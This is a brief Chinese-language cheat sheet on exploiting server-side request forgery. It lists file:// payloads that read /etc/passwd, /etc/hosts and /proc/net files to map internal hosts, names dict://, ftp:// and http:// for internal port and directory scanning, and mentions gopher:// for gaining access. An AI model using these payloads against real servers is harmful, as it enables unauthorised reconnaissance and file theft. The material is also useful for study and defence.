ssrf利用

查找内网存活主机ip（文件读取）

使用file://协议
file:// 从文件系统中获取文件内容，格式为file://文件路径

file:///etc/passwd              读取文件passwd
file:///etc/hosts               显示当前操作系统网卡的IP
file:///proc/net/arp            显示arp缓存表（寻找内网其他主机）
file:///proc/net/fib_trie       显示当前网段路由信息

file: ///etc/hosts

file: ///proc/net/arp

file: ///proc/net/fib_trie

查找内网主机开放端口（端口扫描）

可以使用

• dict:// 字典服务协议，效率高，dict://ip:3306/info
• ftp:// 效率较低
  

目录扫描

使用http://

获取权限（gopher://）

gopher伪协议